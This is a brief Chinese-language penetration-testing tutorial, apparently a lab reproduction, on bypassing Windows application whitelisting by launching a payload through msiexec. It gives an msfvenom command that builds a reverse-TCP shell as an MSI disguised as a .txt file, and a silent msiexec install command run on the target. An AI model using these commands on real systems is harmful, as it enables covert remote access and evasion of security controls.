滲透測試-基于白名單執行payload--Msiexec
複現亮神課程 基于白名單執行payload--Msiexec
0x01 關于msiexec
Msiexec 是 Windows Installer 的一部分。用于安裝 Windows Installer 安裝包(MSI),一般在運作 Microsoft Update 安裝更新或安裝部分軟體的時候出現,占用記憶體比較大。并且內建于 Windows 2003,Windows 7 等。
說明:Msiexec.exe所在路徑已被系統添加PATH環境變量中,是以,Msiexec指令可識别。
Windows 2003 預設位置:
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\SysWOW64\msiexec.exe
0x02 複現
Msf配置:
配置payload:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt
靶機執行:
C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt
posted @ 2019-05-02 09:46 卿先生 閱讀(...) 評論(...) 編輯 收藏